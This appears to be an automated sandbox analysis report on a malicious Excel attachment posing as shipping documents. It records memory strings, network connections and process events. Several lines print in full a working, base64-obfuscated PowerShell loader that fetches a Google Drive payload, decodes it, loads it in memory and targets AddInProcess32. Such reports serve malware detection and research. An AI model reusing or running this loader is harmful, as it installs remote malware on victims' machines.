        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: powershell.exe, 00000005.00000002.442283646.0000000002181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493475801.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.481877021.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 0000000E.00000002.493475801.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: powershell.exe, 0000001A.00000002.525200157.0000000002431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
        Source: powershell.exe, 0000001A.00000002.525200157.0000000002632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
        Source: powershell.exe, 0000000E.00000002.493475801.00000000025F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloap
        Source: powershell.exe, 0000000E.00000002.493475801.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: powershell.exe, 0000000E.00000002.493475801.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.525200157.0000000002802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467916153.000000000335C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465640922.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/
        Source: mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/(
        Source: mshta.exe, 00000004.00000002.417853358.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415217426.0000000002B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/3
        Source: mshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/b
        Source: mshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415290923.000000000051E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.000000000054F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.000000000054F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461799715.0000000000565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.000000000051A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467568296.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462283726.0000000000505000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455711004.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Shipping Documents WMLREF115900.xls, A4230000.0.drString found in binary or memory: https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display
        Source: mshta.exe, 00000004.00000003.415290923.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417694629.0000000000525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415580247.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpa.li/~
        Source: powershell.exe, 00000005.00000002.442283646.000000000238B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.445318910.00000000121B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: mshta.exe, 00000004.00000003.415217426.0000000002B54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417853358.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.493058741.000000000229F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.467980452.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461752032.0000000003382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
        Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
        Source: unknownHTTPS traffic detected: 5.159.62.244:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 5.159.62.243:443 -> 192.168.2.22:49173 version: TLS 1.2
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 4000, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Shipping Documents WMLREF115900.xlsOLE: Microsoft Excel 2007+
        Source: A4230000.0.drOLE: Microsoft Excel 2007+
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingstobegoodwithhislifebestthigns[1].htaJump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and write
        Source: Shipping Documents WMLREF115900.xlsOLE indicator, VBA macros: true
        Source: Shipping Documents WMLREF115900.xlsStream path 'MBd0002400C/\x1Ole' : https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character},yH%OXNutuFj0tNO'>Lpu&q\T^)$Zkt $t8MVK;LZhCEvri6aji6108AansgFkWBPFjf1Co2U4Nc5FJeVT3DzNNmY.0nl#rL]tb
        Source: A4230000.0.drStream path 'MBD0002400C/\x1Ole' : https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character},yH%OXNutuFj0tNO'>Lpu&q\T^)$Zkt $t8MVK;LZhCEvri6aji6108AansgFkWBPFjf1Co2U4Nc5FJeVT3DzNNmY.0nl#rL]tb
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2258
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2258
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2258Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2258
